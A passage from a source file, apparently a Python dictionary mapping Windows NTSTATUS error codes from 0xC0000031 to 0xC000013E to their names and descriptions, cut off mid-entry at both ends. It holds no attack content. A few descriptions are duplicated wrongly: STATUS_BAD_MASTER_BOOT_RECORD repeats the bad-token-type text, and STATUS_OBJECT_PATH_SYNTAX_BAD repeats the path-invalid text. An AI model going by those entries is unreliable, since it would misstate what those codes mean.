("STATUS_INVALID_PARAMETER_MIX","An invalid combination of parameters was specified."), 0xC0000031: ("STATUS_INVALID_QUOTA_LOWER","An attempt was made to lower a quota limit below the current usage."), 0xC0000032: ("STATUS_DISK_CORRUPT_ERROR","{Corrupt Disk} The file system structure on the disk is corrupt and unusable. Run the Chkdsk utility on the volume %hs."), 0xC0000033: ("STATUS_OBJECT_NAME_INVALID","The object name is invalid."), 0xC0000034: ("STATUS_OBJECT_NAME_NOT_FOUND","The object name is not found."), 0xC0000035: ("STATUS_OBJECT_NAME_COLLISION","The object name already exists."), 0xC0000037: ("STATUS_PORT_DISCONNECTED","An attempt was made to send a message to a disconnected communication port."), 0xC0000038: ("STATUS_DEVICE_ALREADY_ATTACHED","An attempt was made to attach to a device that was already attached to another device."), 0xC0000039: ("STATUS_OBJECT_PATH_INVALID","The object path component was not a directory object."), 0xC000003A: ("STATUS_OBJECT_PATH_NOT_FOUND","{Path Not Found} The path %hs does not exist."), 0xC000003B: ("STATUS_OBJECT_PATH_SYNTAX_BAD","The object path component was not a directory object."), 0xC000003C: ("STATUS_DATA_OVERRUN","{Data Overrun} A data overrun error occurred."), 0xC000003D: ("STATUS_DATA_LATE_ERROR","{Data Late} A data late error occurred."), 0xC000003E: ("STATUS_DATA_ERROR","{Data Error} An error occurred in reading or writing data."), 0xC000003F: ("STATUS_CRC_ERROR","{Bad CRC} A cyclic redundancy check (CRC) checksum error occurred."), 0xC0000040: ("STATUS_SECTION_TOO_BIG","{Section Too Large} The specified section is too big to map the file."), 0xC0000041: ("STATUS_PORT_CONNECTION_REFUSED","The NtConnectPort request is refused."), 0xC0000042: ("STATUS_INVALID_PORT_HANDLE","The type of port handle is invalid for the operation that is requested."), 0xC0000043: ("STATUS_SHARING_VIOLATION","A file cannot be opened because the share access flags are incompatible."), 0xC0000044: ("STATUS_QUOTA_EXCEEDED","Insufficient quota exists to complete the operation."), 0xC0000045: ("STATUS_INVALID_PAGE_PROTECTION","The specified page protection was not valid."), 0xC0000046: ("STATUS_MUTANT_NOT_OWNED","An attempt to release a mutant object was made by a thread that was not the owner of the mutant object."), 0xC0000047: ("STATUS_SEMAPHORE_LIMIT_EXCEEDED","An attempt was made to release a semaphore such that its maximum count would have been exceeded."), 0xC0000048: ("STATUS_PORT_ALREADY_SET","An attempt was made to set the DebugPort or ExceptionPort of a process, but a port already exists in the process, or an attempt was made to set the CompletionPort of a file but a port was already set in the file, or an attempt was made to set the associated completion port of an ALPC port but it is already set."), 0xC0000049: ("STATUS_SECTION_NOT_IMAGE","An attempt was made to query image information on a section that does not map an image."), 0xC000004A: ("STATUS_SUSPEND_COUNT_EXCEEDED","An attempt was made to suspend a thread whose suspend count was at its maximum."), 0xC000004B: ("STATUS_THREAD_IS_TERMINATING","An attempt was made to suspend a thread that has begun termination."), 0xC000004C: ("STATUS_BAD_WORKING_SET_LIMIT","An attempt was made to set the working set limit to an invalid value (for example, the minimum greater than maximum)."), 0xC000004D: ("STATUS_INCOMPATIBLE_FILE_MAP","A section was created to map a file that is not compatible with an already existing section that maps the same file."), 0xC000004E: ("STATUS_SECTION_PROTECTION","A view to a section specifies a protection that is incompatible with the protection of the initial view."), 0xC000004F: ("STATUS_EAS_NOT_SUPPORTED","An operation involving EAs failed because the file system does not support EAs."), 0xC0000050: ("STATUS_EA_TOO_LARGE","An EA operation failed because the EA set is too large."), 0xC0000051: ("STATUS_NONEXISTENT_EA_ENTRY","An EA operation failed because the name or EA index is invalid."), 0xC0000052: ("STATUS_NO_EAS_ON_FILE","The file for which EAs were requested has no EAs."), 0xC0000053: ("STATUS_EA_CORRUPT_ERROR","The EA is corrupt and cannot be read."), 0xC0000054: ("STATUS_FILE_LOCK_CONFLICT","A requested read/write cannot be granted due to a conflicting file lock."), 0xC0000055: ("STATUS_LOCK_NOT_GRANTED","A requested file lock cannot be granted due to other existing locks."), 0xC0000056: ("STATUS_DELETE_PENDING","A non-close operation has been requested of a file object that has a delete pending."), 0xC0000057: ("STATUS_CTL_FILE_NOT_SUPPORTED","An attempt was made to set the control attribute on a file. This attribute is not supported in the destination file system."), 0xC0000058: ("STATUS_UNKNOWN_REVISION","Indicates a revision number that was encountered or specified is not one that is known by the service. It may be a more recent revision than the service is aware of."), 0xC0000059: ("STATUS_REVISION_MISMATCH","Indicates that two revision levels are incompatible."), 0xC000005A: ("STATUS_INVALID_OWNER","Indicates a particular security ID may not be assigned as the owner of an object."), 0xC000005B: ("STATUS_INVALID_PRIMARY_GROUP","Indicates a particular security ID may not be assigned as the primary group of an object."), 0xC000005C: ("STATUS_NO_IMPERSONATION_TOKEN","An attempt has been made to operate on an impersonation token by a thread that is not currently impersonating a client."), 0xC000005D: ("STATUS_CANT_DISABLE_MANDATORY","A mandatory group may not be disabled."), 0xC000005E: ("STATUS_NO_LOGON_SERVERS","No logon servers are currently available to service the logon request."), 0xC000005F: ("STATUS_NO_SUCH_LOGON_SESSION","A specified logon session does not exist. It may already have been terminated."), 0xC0000060: ("STATUS_NO_SUCH_PRIVILEGE","A specified privilege does not exist."), 0xC0000061: ("STATUS_PRIVILEGE_NOT_HELD","A required privilege is not held by the client."), 0xC0000062: ("STATUS_INVALID_ACCOUNT_NAME","The name provided is not a properly formed account name."), 0xC0000063: ("STATUS_USER_EXISTS","The specified account already exists."), 0xC0000064: ("STATUS_NO_SUCH_USER","The specified account does not exist."), 0xC0000065: ("STATUS_GROUP_EXISTS","The specified group already exists."), 0xC0000066: ("STATUS_NO_SUCH_GROUP","The specified group does not exist."), 0xC0000067: ("STATUS_MEMBER_IN_GROUP","The specified user account is already in the specified group account. Also used to indicate a group cannot be deleted because it contains a member."), 0xC0000068: ("STATUS_MEMBER_NOT_IN_GROUP","The specified user account is not a member of the specified group account."), 0xC0000069: ("STATUS_LAST_ADMIN","Indicates the requested operation would disable or delete the last remaining administration account. This is not allowed to prevent creating a situation in which the system cannot be administrated."), 0xC000006A: ("STATUS_WRONG_PASSWORD","When trying to update a password, this return status indicates that the value provided as the current password is not correct."), 0xC000006B: ("STATUS_ILL_FORMED_PASSWORD","When trying to update a password, this return status indicates that the value provided for the new password contains values that are not allowed in passwords."), 0xC000006C: ("STATUS_PASSWORD_RESTRICTION","When trying to update a password, this status indicates that some password update rule has been violated. For example, the password may not meet length criteria."), 0xC000006D: ("STATUS_LOGON_FAILURE","The attempted logon is invalid. This is either due to a bad username or authentication information."), 0xC000006E: ("STATUS_ACCOUNT_RESTRICTION","Indicates a referenced user name and authentication information are valid, but some user account restriction has prevented successful authentication (such as time-of-day restrictions)."), 0xC000006F: ("STATUS_INVALID_LOGON_HOURS","The user account has time restrictions and may not be logged onto at this time."), 0xC0000070: ("STATUS_INVALID_WORKSTATION","The user account is restricted so that it may not be used to log on from the source workstation."), 0xC0000071: ("STATUS_PASSWORD_EXPIRED","The user account password has expired."), 0xC0000072: ("STATUS_ACCOUNT_DISABLED","The referenced account is currently disabled and may not be logged on to."), 0xC0000073: ("STATUS_NONE_MAPPED","None of the information to be translated has been translated."), 0xC0000074: ("STATUS_TOO_MANY_LUIDS_REQUESTED","The number of LUIDs requested may not be allocated with a single allocation."), 0xC0000075: ("STATUS_LUIDS_EXHAUSTED","Indicates there are no more LUIDs to allocate."), 0xC0000076: ("STATUS_INVALID_SUB_AUTHORITY","Indicates the sub-authority value is invalid for the particular use."), 0xC0000077: ("STATUS_INVALID_ACL","Indicates the ACL structure is not valid."), 0xC0000078: ("STATUS_INVALID_SID","Indicates the SID structure is not valid."), 0xC0000079: ("STATUS_INVALID_SECURITY_DESCR","Indicates the SECURITY_DESCRIPTOR structure is not valid."), 0xC000007A: ("STATUS_PROCEDURE_NOT_FOUND","Indicates the specified procedure address cannot be found in the DLL."), 0xC000007B: ("STATUS_INVALID_IMAGE_FORMAT","{Bad Image} %hs is either not designed to run on Windows or it contains an error. Try installing the program again using the original installation media or contact your system administrator or the software vendor for support."), 0xC000007C: ("STATUS_NO_TOKEN","An attempt was made to reference a token that does not exist. This is typically done by referencing the token that is associated with a thread when the thread is not impersonating a client."), 0xC000007D: ("STATUS_BAD_INHERITANCE_ACL","Indicates that an attempt to build either an inherited ACL or ACE was not successful. This can be caused by a number of things. One of the more probable causes is the replacement of a CreatorId with a SID that did not fit into the ACE or ACL."), 0xC000007E: ("STATUS_RANGE_NOT_LOCKED","The range specified in NtUnlockFile was not locked."), 0xC000007F: ("STATUS_DISK_FULL","An operation failed because the disk was full."), 0xC0000080: ("STATUS_SERVER_DISABLED","The GUID allocation server is disabled at the moment."), 0xC0000081: ("STATUS_SERVER_NOT_DISABLED","The GUID allocation server is enabled at the moment."), 0xC0000082: ("STATUS_TOO_MANY_GUIDS_REQUESTED","Too many GUIDs were requested from the allocation server at once."), 0xC0000083: ("STATUS_GUIDS_EXHAUSTED","The GUIDs could not be allocated because the Authority Agent was exhausted."), 0xC0000084: ("STATUS_INVALID_ID_AUTHORITY","The value provided was an invalid value for an identifier authority."), 0xC0000085: ("STATUS_AGENTS_EXHAUSTED","No more authority agent values are available for the particular identifier authority value."), 0xC0000086: ("STATUS_INVALID_VOLUME_LABEL","An invalid volume label has been specified."), 0xC0000087: ("STATUS_SECTION_NOT_EXTENDED","A mapped section could not be extended."), 0xC0000088: ("STATUS_NOT_MAPPED_DATA","Specified section to flush does not map a data file."), 0xC0000089: ("STATUS_RESOURCE_DATA_NOT_FOUND","Indicates the specified image file did not contain a resource section."), 0xC000008A: ("STATUS_RESOURCE_TYPE_NOT_FOUND","Indicates the specified resource type cannot be found in the image file."), 0xC000008B: ("STATUS_RESOURCE_NAME_NOT_FOUND","Indicates the specified resource name cannot be found in the image file."), 0xC000008C: ("STATUS_ARRAY_BOUNDS_EXCEEDED","{EXCEPTION} Array bounds exceeded."), 0xC000008D: ("STATUS_FLOAT_DENORMAL_OPERAND","{EXCEPTION} Floating-point denormal operand."), 0xC000008E: ("STATUS_FLOAT_DIVIDE_BY_ZERO","{EXCEPTION} Floating-point division by zero."), 0xC000008F: ("STATUS_FLOAT_INEXACT_RESULT","{EXCEPTION} Floating-point inexact result."), 0xC0000090: ("STATUS_FLOAT_INVALID_OPERATION","{EXCEPTION} Floating-point invalid operation."), 0xC0000091: ("STATUS_FLOAT_OVERFLOW","{EXCEPTION} Floating-point overflow."), 0xC0000092: ("STATUS_FLOAT_STACK_CHECK","{EXCEPTION} Floating-point stack check."), 0xC0000093: ("STATUS_FLOAT_UNDERFLOW","{EXCEPTION} Floating-point underflow."), 0xC0000094: ("STATUS_INTEGER_DIVIDE_BY_ZERO","{EXCEPTION} Integer division by zero."), 0xC0000095: ("STATUS_INTEGER_OVERFLOW","{EXCEPTION} Integer overflow."), 0xC0000096: ("STATUS_PRIVILEGED_INSTRUCTION","{EXCEPTION} Privileged instruction."), 0xC0000097: ("STATUS_TOO_MANY_PAGING_FILES","An attempt was made to install more paging files than the system supports."), 0xC0000098: ("STATUS_FILE_INVALID","The volume for a file has been externally altered such that the opened file is no longer valid."), 0xC0000099: ("STATUS_ALLOTTED_SPACE_EXCEEDED","When a block of memory is allotted for future updates, such as the memory allocated to hold discretionary access control and primary group information, successive updates may exceed the amount of memory originally allotted. Because a quota may already have been charged to several processes that have handles to the object, it is not reasonable to alter the size of the allocated memory. Instead, a request that requires more memory than has been allotted must fail and the STATUS_ALLOTTED_SPACE_EXCEEDED error returned."), 0xC000009A: ("STATUS_INSUFFICIENT_RESOURCES","Insufficient system resources exist to complete the API."), 0xC000009B: ("STATUS_DFS_EXIT_PATH_FOUND","An attempt has been made to open a DFS exit path control file."), 0xC000009C: ("STATUS_DEVICE_DATA_ERROR","There are bad blocks (sectors) on the hard disk."), 0xC000009D: ("STATUS_DEVICE_NOT_CONNECTED","There is bad cabling, non-termination, or the controller is not able to obtain access to the hard disk."), 0xC000009F: ("STATUS_FREE_VM_NOT_AT_BASE","Virtual memory cannot be freed because the base address is not the base of the region and a region size of zero was specified."), 0xC00000A0: ("STATUS_MEMORY_NOT_ALLOCATED","An attempt was made to free virtual memory that is not allocated."), 0xC00000A1: ("STATUS_WORKING_SET_QUOTA","The working set is not big enough to allow the requested pages to be locked."), 0xC00000A2: ("STATUS_MEDIA_WRITE_PROTECTED","{Write Protect Error} The disk cannot be written to because it is write-protected. Remove the write protection from the volume %hs in drive %hs."), 0xC00000A3: ("STATUS_DEVICE_NOT_READY","{Drive Not Ready} The drive is not ready for use; its door may be open. Check drive %hs and make sure that a disk is inserted and that the drive door is closed."), 0xC00000A4: ("STATUS_INVALID_GROUP_ATTRIBUTES","The specified attributes are invalid or are incompatible with the attributes for the group as a whole."), 0xC00000A5: ("STATUS_BAD_IMPERSONATION_LEVEL","A specified impersonation level is invalid. Also used to indicate that a required impersonation level was not provided."), 0xC00000A6: ("STATUS_CANT_OPEN_ANONYMOUS","An attempt was made to open an anonymous-level token. Anonymous tokens may not be opened."), 0xC00000A7: ("STATUS_BAD_VALIDATION_CLASS","The validation information class requested was invalid."), 0xC00000A8: ("STATUS_BAD_TOKEN_TYPE","The type of a token object is inappropriate for its attempted use."), 0xC00000A9: ("STATUS_BAD_MASTER_BOOT_RECORD","The type of a token object is inappropriate for its attempted use."), 0xC00000AA: ("STATUS_INSTRUCTION_MISALIGNMENT","An attempt was made to execute an instruction at an unaligned address and the host system does not support unaligned instruction references."), 0xC00000AB: ("STATUS_INSTANCE_NOT_AVAILABLE","The maximum named pipe instance count has been reached."), 0xC00000AC: ("STATUS_PIPE_NOT_AVAILABLE","An instance of a named pipe cannot be found in the listening state."), 0xC00000AD: ("STATUS_INVALID_PIPE_STATE","The named pipe is not in the connected or closing state."), 0xC00000AE: ("STATUS_PIPE_BUSY","The specified pipe is set to complete operations and there are current I/O operations queued so that it cannot be changed to queue operations."), 0xC00000AF: ("STATUS_ILLEGAL_FUNCTION","The specified handle is not open to the server end of the named pipe."), 0xC00000B0: ("STATUS_PIPE_DISCONNECTED","The specified named pipe is in the disconnected state."), 0xC00000B1: ("STATUS_PIPE_CLOSING","The specified named pipe is in the closing state."), 0xC00000B2: ("STATUS_PIPE_CONNECTED","The specified named pipe is in the connected state."), 0xC00000B3: ("STATUS_PIPE_LISTENING","The specified named pipe is in the listening state."), 0xC00000B4: ("STATUS_INVALID_READ_MODE","The specified named pipe is not in message mode."), 0xC00000B5: ("STATUS_IO_TIMEOUT","{Device Timeout} The specified I/O operation on %hs was not completed before the time-out period expired."), 0xC00000B6: ("STATUS_FILE_FORCED_CLOSED","The specified file has been closed by another process."), 0xC00000B7: ("STATUS_PROFILING_NOT_STARTED","Profiling is not started."), 0xC00000B8: ("STATUS_PROFILING_NOT_STOPPED","Profiling is not stopped."), 0xC00000B9: ("STATUS_COULD_NOT_INTERPRET","The passed ACL did not contain the minimum required information."), 0xC00000BA: ("STATUS_FILE_IS_A_DIRECTORY","The file that was specified as a target is a directory, and the caller specified that it could be anything but a directory."), 0xC00000BB: ("STATUS_NOT_SUPPORTED","The request is not supported."), 0xC00000BC: ("STATUS_REMOTE_NOT_LISTENING","This remote computer is not listening."), 0xC00000BD: ("STATUS_DUPLICATE_NAME","A duplicate name exists on the network."), 0xC00000BE: ("STATUS_BAD_NETWORK_PATH","The network path cannot be located."), 0xC00000BF: ("STATUS_NETWORK_BUSY","The network is busy."), 0xC00000C0: ("STATUS_DEVICE_DOES_NOT_EXIST","This device does not exist."), 0xC00000C1: ("STATUS_TOO_MANY_COMMANDS","The network BIOS command limit has been reached."), 0xC00000C2: ("STATUS_ADAPTER_HARDWARE_ERROR","An I/O adapter hardware error has occurred."), 0xC00000C3: ("STATUS_INVALID_NETWORK_RESPONSE","The network responded incorrectly."), 0xC00000C4: ("STATUS_UNEXPECTED_NETWORK_ERROR","An unexpected network error occurred."), 0xC00000C5: ("STATUS_BAD_REMOTE_ADAPTER","The remote adapter is not compatible."), 0xC00000C6: ("STATUS_PRINT_QUEUE_FULL","The print queue is full."), 0xC00000C7: ("STATUS_NO_SPOOL_SPACE","Space to store the file that is waiting to be printed is not available on the server."), 0xC00000C8: ("STATUS_PRINT_CANCELLED","The requested print file has been canceled."), 0xC00000C9: ("STATUS_NETWORK_NAME_DELETED","The network name was deleted."), 0xC00000CA: ("STATUS_NETWORK_ACCESS_DENIED","Network access is denied."), 0xC00000CB: ("STATUS_BAD_DEVICE_TYPE","{Incorrect Network Resource Type} The specified device type (LPT, for example) conflicts with the actual device type on the remote resource."), 0xC00000CC: ("STATUS_BAD_NETWORK_NAME","{Network Name Not Found} The specified share name cannot be found on the remote server."), 0xC00000CD: ("STATUS_TOO_MANY_NAMES","The name limit for the network adapter card of the local computer was exceeded."), 0xC00000CE: ("STATUS_TOO_MANY_SESSIONS","The network BIOS session limit was exceeded."), 0xC00000CF: ("STATUS_SHARING_PAUSED","File sharing has been temporarily paused."), 0xC00000D0: ("STATUS_REQUEST_NOT_ACCEPTED","No more connections can be made to this remote computer at this time because the computer has already accepted the maximum number of connections."), 0xC00000D1: ("STATUS_REDIRECTOR_PAUSED","Print or disk redirection is temporarily paused."), 0xC00000D2: ("STATUS_NET_WRITE_FAULT","A network data fault occurred."), 0xC00000D3: ("STATUS_PROFILING_AT_LIMIT","The number of active profiling objects is at the maximum and no more may be started."), 0xC00000D4: ("STATUS_NOT_SAME_DEVICE","{Incorrect Volume} The destination file of a rename request is located on a different device than the source of the rename request."), 0xC00000D5: ("STATUS_FILE_RENAMED","The specified file has been renamed and thus cannot be modified."), 0xC00000D6: ("STATUS_VIRTUAL_CIRCUIT_CLOSED","{Network Request Timeout} The session with a remote server has been disconnected because the time-out interval for a request has expired."), 0xC00000D7: ("STATUS_NO_SECURITY_ON_OBJECT","Indicates an attempt was made to operate on the security of an object that does not have security associated with it."), 0xC00000D8: ("STATUS_CANT_WAIT","Used to indicate that an operation cannot continue without blocking for I/O."), 0xC00000D9: ("STATUS_PIPE_EMPTY","Used to indicate that a read operation was done on an empty pipe."), 0xC00000DA: ("STATUS_CANT_ACCESS_DOMAIN_INFO","Configuration information could not be read from the domain controller, either because the machine is unavailable or access has been denied."), 0xC00000DB: ("STATUS_CANT_TERMINATE_SELF","Indicates that a thread attempted to terminate itself by default (called NtTerminateThread with NULL) and it was the last thread in the current process."), 0xC00000DC: ("STATUS_INVALID_SERVER_STATE","Indicates the Sam Server was in the wrong state to perform the desired operation."), 0xC00000DD: ("STATUS_INVALID_DOMAIN_STATE","Indicates the domain was in the wrong state to perform the desired operation."), 0xC00000DE: ("STATUS_INVALID_DOMAIN_ROLE","This operation is only allowed for the primary domain controller of the domain."), 0xC00000DF: ("STATUS_NO_SUCH_DOMAIN","The specified domain did not exist."), 0xC00000E0: ("STATUS_DOMAIN_EXISTS","The specified domain already exists."), 0xC00000E1: ("STATUS_DOMAIN_LIMIT_EXCEEDED","An attempt was made to exceed the limit on the number of domains per server for this release."), 0xC00000E2: ("STATUS_OPLOCK_NOT_GRANTED","An error status returned when the opportunistic lock (oplock) request is denied."), 0xC00000E3: ("STATUS_INVALID_OPLOCK_PROTOCOL","An error status returned when an invalid opportunistic lock (oplock) acknowledgment is received by a file system."), 0xC00000E4: ("STATUS_INTERNAL_DB_CORRUPTION","This error indicates that the requested operation cannot be completed due to a catastrophic media failure or an on-disk data structure corruption."), 0xC00000E5: ("STATUS_INTERNAL_ERROR","An internal error occurred."), 0xC00000E6: ("STATUS_GENERIC_NOT_MAPPED","Indicates generic access types were contained in an access mask which should already be mapped to non-generic access types."), 0xC00000E7: ("STATUS_BAD_DESCRIPTOR_FORMAT","Indicates a security descriptor is not in the necessary format (absolute or self-relative)."), 0xC00000E8: ("STATUS_INVALID_USER_BUFFER","An access to a user buffer failed at an expected point in time. This code is defined because the caller does not want to accept STATUS_ACCESS_VIOLATION in its filter."), 0xC00000E9: ("STATUS_UNEXPECTED_IO_ERROR","If an I/O error that is not defined in the standard FsRtl filter is returned, it is converted to the following error, which is guaranteed to be in the filter. In this case, information is lost; however, the filter correctly handles the exception."), 0xC00000EA: ("STATUS_UNEXPECTED_MM_CREATE_ERR","If an MM error that is not defined in the standard FsRtl filter is returned, it is converted to one of the following errors, which are guaranteed to be in the filter. In this case, information is lost; however, the filter correctly handles the exception."), 0xC00000EB: ("STATUS_UNEXPECTED_MM_MAP_ERROR","If an MM error that is not defined in the standard FsRtl filter is returned, it is converted to one of the following errors, which are guaranteed to be in the filter. In this case, information is lost; however, the filter correctly handles the exception."), 0xC00000EC: ("STATUS_UNEXPECTED_MM_EXTEND_ERR","If an MM error that is not defined in the standard FsRtl filter is returned, it is converted to one of the following errors, which are guaranteed to be in the filter. In this case, information is lost; however, the filter correctly handles the exception."), 0xC00000ED: ("STATUS_NOT_LOGON_PROCESS","The requested action is restricted for use by logon processes only. The calling process has not registered as a logon process."), 0xC00000EE: ("STATUS_LOGON_SESSION_EXISTS","An attempt has been made to start a new session manager or LSA logon session by using an ID that is already in use."), 0xC00000EF: ("STATUS_INVALID_PARAMETER_1","An invalid parameter was passed to a service or function as the first argument."), 0xC00000F0: ("STATUS_INVALID_PARAMETER_2","An invalid parameter was passed to a service or function as the second argument."), 0xC00000F1: ("STATUS_INVALID_PARAMETER_3","An invalid parameter was passed to a service or function as the third argument."), 0xC00000F2: ("STATUS_INVALID_PARAMETER_4","An invalid parameter was passed to a service or function as the fourth argument."), 0xC00000F3: ("STATUS_INVALID_PARAMETER_5","An invalid parameter was passed to a service or function as the fifth argument."), 0xC00000F4: ("STATUS_INVALID_PARAMETER_6","An invalid parameter was passed to a service or function as the sixth argument."), 0xC00000F5: ("STATUS_INVALID_PARAMETER_7","An invalid parameter was passed to a service or function as the seventh argument."), 0xC00000F6: ("STATUS_INVALID_PARAMETER_8","An invalid parameter was passed to a service or function as the eighth argument."), 0xC00000F7: ("STATUS_INVALID_PARAMETER_9","An invalid parameter was passed to a service or function as the ninth argument."), 0xC00000F8: ("STATUS_INVALID_PARAMETER_10","An invalid parameter was passed to a service or function as the tenth argument."), 0xC00000F9: ("STATUS_INVALID_PARAMETER_11","An invalid parameter was passed to a service or function as the eleventh argument."), 0xC00000FA: ("STATUS_INVALID_PARAMETER_12","An invalid parameter was passed to a service or function as the twelfth argument."), 0xC00000FB: ("STATUS_REDIRECTOR_NOT_STARTED","An attempt was made to access a network file, but the network software was not yet started."), 0xC00000FC: ("STATUS_REDIRECTOR_STARTED","An attempt was made to start the redirector, but the redirector has already been started."), 0xC00000FD: ("STATUS_STACK_OVERFLOW","A new guard page for the stack cannot be created."), 0xC00000FE: ("STATUS_NO_SUCH_PACKAGE","A specified authentication package is unknown."), 0xC00000FF: ("STATUS_BAD_FUNCTION_TABLE","A malformed function table was encountered during an unwind operation."), 0xC0000100: ("STATUS_VARIABLE_NOT_FOUND","Indicates the specified environment variable name was not found in the specified environment block."), 0xC0000101: ("STATUS_DIRECTORY_NOT_EMPTY","Indicates that the directory trying to be deleted is not empty."), 0xC0000102: ("STATUS_FILE_CORRUPT_ERROR","{Corrupt File} The file or directory %hs is corrupt and unreadable. Run the Chkdsk utility."), 0xC0000103: ("STATUS_NOT_A_DIRECTORY","A requested opened file is not a directory."), 0xC0000104: ("STATUS_BAD_LOGON_SESSION_STATE","The logon session is not in a state that is consistent with the requested operation."), 0xC0000105: ("STATUS_LOGON_SESSION_COLLISION","An internal LSA error has occurred. An authentication package has requested the creation of a logon session but the ID of an already existing logon session has been specified."), 0xC0000106: ("STATUS_NAME_TOO_LONG","A specified name string is too long for its intended use."), 0xC0000107: ("STATUS_FILES_OPEN","The user attempted to force close the files on a redirected drive, but there were opened files on the drive, and the user did not specify a sufficient level of force."), 0xC0000108: ("STATUS_CONNECTION_IN_USE","The user attempted to force close the files on a redirected drive, but there were opened directories on the drive, and the user did not specify a sufficient level of force."), 0xC0000109: ("STATUS_MESSAGE_NOT_FOUND","RtlFindMessage could not locate the requested message ID in the message table resource."), 0xC000010A: ("STATUS_PROCESS_IS_TERMINATING","An attempt was made to duplicate an object handle into or out of an exiting process."), 0xC000010B: ("STATUS_INVALID_LOGON_TYPE","Indicates an invalid value has been provided for the LogonType requested."), 0xC000010C: ("STATUS_NO_GUID_TRANSLATION","Indicates that an attempt was made to assign protection to a file system file or directory and one of the SIDs in the security descriptor could not be translated into a GUID that could be stored by the file system. This causes the protection attempt to fail, which may cause a file creation attempt to fail."), 0xC000010D: ("STATUS_CANNOT_IMPERSONATE","Indicates that an attempt has been made to impersonate via a named pipe that has not yet been read from."), 0xC000010E: ("STATUS_IMAGE_ALREADY_LOADED","Indicates that the specified image is already loaded."), 0xC0000117: ("STATUS_NO_LDT","Indicates that an attempt was made to change the size of the LDT for a process that has no LDT."), 0xC0000118: ("STATUS_INVALID_LDT_SIZE","Indicates that an attempt was made to grow an LDT by setting its size, or that the size was not an even number of selectors."), 0xC0000119: ("STATUS_INVALID_LDT_OFFSET","Indicates that the starting value for the LDT information was not an integral multiple of the selector size."), 0xC000011A: ("STATUS_INVALID_LDT_DESCRIPTOR","Indicates that the user supplied an invalid descriptor when trying to set up LDT descriptors."), 0xC000011B: ("STATUS_INVALID_IMAGE_NE_FORMAT","The specified image file did not have the correct format. It appears to be NE format."), 0xC000011C: ("STATUS_RXACT_INVALID_STATE","Indicates that the transaction state of a registry subtree is incompatible with the requested operation. For example, a request has been made to start a new transaction with one already in progress, or a request has been made to apply a transaction when one is not currently in progress."), 0xC000011D: ("STATUS_RXACT_COMMIT_FAILURE","Indicates an error has occurred during a registry transaction commit. The database has been left in an unknown, but probably inconsistent, state. The state of the registry transaction is left as COMMITTING."), 0xC000011E: ("STATUS_MAPPED_FILE_SIZE_ZERO","An attempt was made to map a file of size zero with the maximum size specified as zero."), 0xC000011F: ("STATUS_TOO_MANY_OPENED_FILES","Too many files are opened on a remote server. This error should only be returned by the Windows redirector on a remote drive."), 0xC0000120: ("STATUS_CANCELLED","The I/O request was canceled."), 0xC0000121: ("STATUS_CANNOT_DELETE","An attempt has been made to remove a file or directory that cannot be deleted."), 0xC0000122: ("STATUS_INVALID_COMPUTER_NAME","Indicates a name that was specified as a remote computer name is syntactically invalid."), 0xC0000123: ("STATUS_FILE_DELETED","An I/O request other than close was performed on a file after it was deleted, which can only happen to a request that did not complete before the last handle was closed via NtClose."), 0xC0000124: ("STATUS_SPECIAL_ACCOUNT","Indicates an operation that is incompatible with built-in accounts has been attempted on a built-in (special) SAM account. For example, built-in accounts cannot be deleted."), 0xC0000125: ("STATUS_SPECIAL_GROUP","The operation requested may not be performed on the specified group because it is a built-in special group."), 0xC0000126: ("STATUS_SPECIAL_USER","The operation requested may not be performed on the specified user because it is a built-in special user."), 0xC0000127: ("STATUS_MEMBERS_PRIMARY_GROUP","Indicates a member cannot be removed from a group because the group is currently the member's primary group."), 0xC0000128: ("STATUS_FILE_CLOSED","An I/O request other than close and several other special case operations was attempted using a file object that had already been closed."), 0xC0000129: ("STATUS_TOO_MANY_THREADS","Indicates a process has too many threads to perform the requested action. For example, assignment of a primary token may only be performed when a process has zero or one threads."), 0xC000012A: ("STATUS_THREAD_NOT_IN_PROCESS","An attempt was made to operate on a thread within a specific process, but the specified thread is not in the specified process."), 0xC000012B: ("STATUS_TOKEN_ALREADY_IN_USE","An attempt was made to establish a token for use as a primary token but the token is already in use. A token can only be the primary token of one process at a time."), 0xC000012C: ("STATUS_PAGEFILE_QUOTA_EXCEEDED","The page file quota was exceeded."), 0xC000012D: ("STATUS_COMMITMENT_LIMIT","{Out of Virtual Memory} Your system is low on virtual memory. To ensure that Windows runs correctly, increase the size of your virtual memory paging file. For more information, see Help."), 0xC000012E: ("STATUS_INVALID_IMAGE_LE_FORMAT","The specified image file did not have the correct format: it appears to be LE format."), 0xC000012F: ("STATUS_INVALID_IMAGE_NOT_MZ","The specified image file did not have the correct format: it did not have an initial MZ."), 0xC0000130: ("STATUS_INVALID_IMAGE_PROTECT","The specified image file did not have the correct format: it did not have a proper e_lfarlc in the MZ header."), 0xC0000131: ("STATUS_INVALID_IMAGE_WIN_16","The specified image file did not have the correct format: it appears to be a 16-bit Windows image."), 0xC0000132: ("STATUS_LOGON_SERVER_CONFLICT","The Netlogon service cannot start because another Netlogon service running in the domain conflicts with the specified role."), 0xC0000133: ("STATUS_TIME_DIFFERENCE_AT_DC","The time at the primary domain controller is different from the time at the backup domain controller or member server by too large an amount."), 0xC0000134: ("STATUS_SYNCHRONIZATION_REQUIRED","The SAM database on a Windows Server is significantly out of synchronization with the copy on the domain controller. A complete synchronization is required."), 0xC0000135: ("STATUS_DLL_NOT_FOUND","{Unable To Locate Component} This application has failed to start because %hs was not found. Reinstalling the application may fix this problem."), 0xC0000136: ("STATUS_OPEN_FAILED","The NtCreateFile API failed. This error should never be returned to an application; it is a place holder for the Windows LAN Manager Redirector to use in its internal error-mapping routines."), 0xC0000137: ("STATUS_IO_PRIVILEGE_FAILED","{Privilege Failed} The I/O permissions for the process could not be changed."), 0xC0000138: ("STATUS_ORDINAL_NOT_FOUND","{Ordinal Not Found} The ordinal %ld could not be located in the dynamic link library %hs."), 0xC0000139: ("STATUS_ENTRYPOINT_NOT_FOUND","{Entry Point Not Found} The procedure entry point %hs could not be located in the dynamic link library %hs."), 0xC000013A: ("STATUS_CONTROL_C_EXIT","{Application Exit by CTRL+C} The application terminated as a result of a CTRL+C."), 0xC000013B: ("STATUS_LOCAL_DISCONNECT","{Virtual Circuit Closed} The network transport on your computer has closed a network connection. There may or may not be I/O requests outstanding."), 0xC000013C: ("STATUS_REMOTE_DISCONNECT","{Virtual Circuit Closed} The network transport on a remote computer has closed a network connection. There may or may not be I/O requests outstanding."), 0xC000013D: ("STATUS_REMOTE_RESOURCES","{Insufficient Resources on Remote Computer} The remote computer has insufficient resources to complete the network request. For example, the remote computer may not have enough available memory to carry out the request at this time."), 0xC000013E: ("STATUS_LINK_FAILED","{Virtual Circuit 